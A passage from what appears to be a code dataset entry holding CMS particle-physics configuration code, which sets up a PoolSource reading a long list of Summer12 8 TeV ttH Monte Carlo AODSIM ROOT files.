'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D49F4B34-C70B-E211-99F4-0025B3E06400.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D2C6963C-C70B-E211-9D24-002590200908.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D26CAF3C-C70B-E211-A812-002590200930.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D026AE93-B90B-E211-9E76-002481E14D76.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/CCD8F139-C70B-E211-B2E8-003048D47A4C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/CA85ABB8-D90B-E211-A2BB-001E67397E13.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/CA63512E-C70B-E211-8DDF-001E672CC1E7.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/C480E406-A90B-E211-8B58-001E67397D00.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/C0D5E949-9C0B-E211-A208-001E673967C5.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/C0D100AE-D90B-E211-8962-001E67396DBA.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/BCF27C36-C70B-E211-876B-002590200A6C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/B4E711BB-D90B-E211-A42C-001E67396E3C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/B2A005DE-D90B-E211-94B3-001E67397D91.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/AC3D508B-B90B-E211-AB8D-003048D45F2C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/AAC74E91-B90B-E211-A9FF-002590200A98.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/AAAE1D0A-A90B-E211-907D-001E67398CB9.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/A89EA633-C70B-E211-AF12-0025902009A4.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/A836D251-C70B-E211-BFDD-0025902008E4.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/A448E095-E90B-E211-8CED-001E673969D2.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/9EBE5A69-C70B-E211-A36E-001E67398E12.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/9C84FAB1-D90B-E211-8EDF-001E67396874.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/9AFA54C5-D90B-E211-9C13-001E67396568.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/9A4A0F32-C70B-E211-A372-002590200898.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/94BE773D-C70B-E211-836F-001E67398CE1.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/944B6544-B90B-E211-920A-002481E1511E.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/90CBB57E-E90B-E211-AB2F-0025902009C0.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8E16A8F3-D90B-E211-83D6-002590200B0C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8ACD8F9C-B90B-E211-8F86-002590200B4C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8ABCBFC1-D90B-E211-9C77-002590200B68.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8AAE9A07-A90B-E211-ABCF-001E673967C5.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8A5DE24C-C70B-E211-9271-002590200988.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/88CA0942-C70B-E211-A894-0025B31E3CC0.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/7EFFEF3A-C70B-E211-A78B-001E67396A63.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/7CDD1A9C-B90B-E211-99CE-003048D45FD8.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/7A951BB1-D90B-E211-B97A-003048D476B4.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/78C1620C-A90B-E211-AF89-001E67396761.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/748AA33D-C70B-E211-AA21-001E67398390.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/74013EE7-D90B-E211-B929-001E673970C1.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/726A8A0A-A90B-E211-86C8-001E67397094.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/70698A49-C70B-E211-BE12-002590200A28.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6E05B863-C70B-E211-B476-002590200938.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6E03CAFF-D90B-E211-96B9-001E67396C52.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6CB7A769-C70B-E211-A569-002590200A80.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6C3E469D-B90B-E211-93ED-003048D45FE8.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/68D8E30B-A90B-E211-9884-003048673F24.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6644544A-C70B-E211-B9D8-001E67398E49.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/60FAAC62-9C0B-E211-B091-002590200B00.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5E932B7F-F60B-E211-A37C-001E67398C05.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5E2DFB9D-B90B-E211-8767-0025B31E3C3C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5C9369BA-D90B-E211-AB39-001E67397396.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5485BB36-C70B-E211-A62A-002590200A98.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/54439593-B90B-E211-AF3D-001E67398011.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/540D144A-9C0B-E211-BE2D-001E67396C9D.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5087B43E-B90B-E211-834E-003048D45FB6.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/50119B4C-C70B-E211-BC7A-00259020083C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4EBF2B87-B90B-E211-8020-003048D476C4.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4E90C544-B90B-E211-92CF-001E67396DCE.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4E42EA41-C70B-E211-89E7-002590200900.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4E24ECEB-D90B-E211-B732-001E67397CCE.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4A3C00E2-D90B-E211-81B6-0025902009B0.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/487FA490-B90B-E211-B401-003048D45FE8.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/46C80D32-C70B-E211-ADC0-003048D45F98.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4680304C-B90B-E211-9E05-003048D479F2.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4442750C-A90B-E211-982C-001E67396644.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/428A4E96-B90B-E211-8098-002590200B74.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4048B9E0-D90B-E211-AD88-001E67397B07.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3ECD1D4C-B90B-E211-BCE7-003048D46034.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3EA42648-9C0B-E211-96A1-001E673972F6.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3E5C2DB5-D90B-E211-AFAA-9C8E991A143E.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3C91E824-A90B-E211-A981-001E67397D00.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3AF523B1-D90B-E211-A075-001E67396BB7.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3A3BB131-C70B-E211-AE83-001E67396DB5.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3642D7AF-D90B-E211-A79C-0030486740BA.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/30A91F44-9C0B-E211-ABA7-001E6739811A.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/30897650-C70B-E211-9F69-0025902008D8.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/304AEF43-C70B-E211-8856-003048D45F98.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2E24DE3A-B90B-E211-ACC7-0025B3E06556.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2CE679E6-D90B-E211-B835-002590200B0C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2C7439E9-D90B-E211-8919-002590200930.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2AFB4848-B90B-E211-A519-001E673965FE.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2A854B08-A90B-E211-9851-001E67397701.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2817039C-B90B-E211-9F8D-0025B31E3C58.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/241AF10A-A90B-E211-BB12-001E67397CCE.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/240A3B43-B90B-E211-BA5F-002481E14FFC.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/20986287-B90B-E211-942A-003048D47A4C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/1EB30D07-DA0B-E211-BE8F-001E67398E62.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/1E2DEC38-B90B-E211-B323-003048D476C2.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/1C490588-B90B-E211-99B7-003048D45FAE.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0E69E144-B90B-E211-AFD2-0025B3E05DB6.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0CF5EAB8-D90B-E211-AD4B-002590200AD0.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0CBE6239-B90B-E211-8155-001E67396A18.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/08A93150-9C0B-E211-9BF5-001E67396EAA.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0639D68C-B90B-E211-953D-003048D4609E.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/060DDA6A-C70B-E211-BF0C-001E67396D4C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/02C8D108-DA0B-E211-8141-001E67397396.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0078C0C1-D90B-E211-83A4-001E67396E32.root'\n ])\nsecFiles.extend([])\n",
"step-3": "<mask token>\nmaxEvents = cms.untracked.PSet(input=cms.untracked.int32(-1))\nreadFiles = cms.untracked.vstring()\nsecFiles = cms.untracked.vstring()\nsource = cms.Source('PoolSource', fileNames=readFiles, secondaryFileNames=\n secFiles)\nreadFiles.extend([\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/FE26AAB2-D90B-E211-AD0F-0025902009B8.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/FCB6A333-C70B-E211-8C99-001E67396D51.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/FA9CB2B5-D90B-E211-82B1-001E67397B07.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F8F81697-E90B-E211-9A48-002590200834.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F88B7838-C70B-E211-8971-001E673968F1.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F6481280-E90B-E211-8349-002590200B34.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F4DAB680-B90B-E211-BE7E-003048D47A6C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F2F3F436-C70B-E211-A3A4-002481E1511E.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F03693B3-D90B-E211-8CFB-001E67398633.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EEF20E3B-C70B-E211-953A-002590200970.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EEA69380-E90B-E211-833A-002590200970.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EE92E708-A90B-E211-BE6A-001E67397B07.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EC8A6530-C70B-E211-9D59-002590200840.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EAE34E85-B90B-E211-B5AD-003048673F3A.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EACF738F-E90B-E211-8D44-00259020081C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/E43E9F40-C70B-E211-8CFE-001E67396644.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DEF585B4-D90B-E211-AD4B-002590200B38.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DE991237-C70B-E211-A065-001E67397003.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DE69B13F-B90B-E211-A320-002481E1511E.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DCDE4B42-C70B-E211-9F88-003048D4602A.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DC7EDE05-A90B-E211-B465-0025902008F4.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DAFF741D-A90B-E211-B24E-001E673969D2.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D865D241-B90B-E211-A391-003048673F26.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D6C4A74C-C70B-E211-B449-003048D45F78.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D4EB5C31-C70B-E211-AC1B-002590200AD0.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D49F4B34-C70B-E211-99F4-0025B3E06400.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D2C6963C-C70B-E211-9D24-002590200908.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D26CAF3C-C70B-E211-A812-002590200930.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D026AE93-B90B-E211-9E76-002481E14D76.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/CCD8F139-C70B-E211-B2E8-003048D47A4C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/CA85ABB8-D90B-E211-A2BB-001E67397E13.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/CA63512E-C70B-E211-8DDF-001E672CC1E7.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/C480E406-A90B-E211-8B58-001E67397D00.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/C0D5E949-9C0B-E211-A208-001E673967C5.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/C0D100AE-D90B-E211-8962-001E67396DBA.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/BCF27C36-C70B-E211-876B-002590200A6C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/B4E711BB-D90B-E211-A42C-001E67396E3C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/B2A005DE-D90B-E211-94B3-001E67397D91.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/AC3D508B-B90B-E211-AB8D-003048D45F2C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/AAC74E91-B90B-E211-A9FF-002590200A98.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/AAAE1D0A-A90B-E211-907D-001E67398CB9.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/A89EA633-C70B-E211-AF12-0025902009A4.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/A836D251-C70B-E211-BFDD-0025902008E4.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/A448E095-E90B-E211-8CED-001E673969D2.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/9EBE5A69-C70B-E211-A36E-001E67398E12.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/9C84FAB1-D90B-E211-8EDF-001E67396874.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/9AFA54C5-D90B-E211-9C13-001E67396568.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/9A4A0F32-C70B-E211-A372-002590200898.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/94BE773D-C70B-E211-836F-001E67398CE1.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/944B6544-B90B-E211-920A-002481E1511E.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/90CBB57E-E90B-E211-AB2F-0025902009C0.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8E16A8F3-D90B-E211-83D6-002590200B0C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8ACD8F9C-B90B-E211-8F86-002590200B4C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8ABCBFC1-D90B-E211-9C77-002590200B68.root'\n ,\n 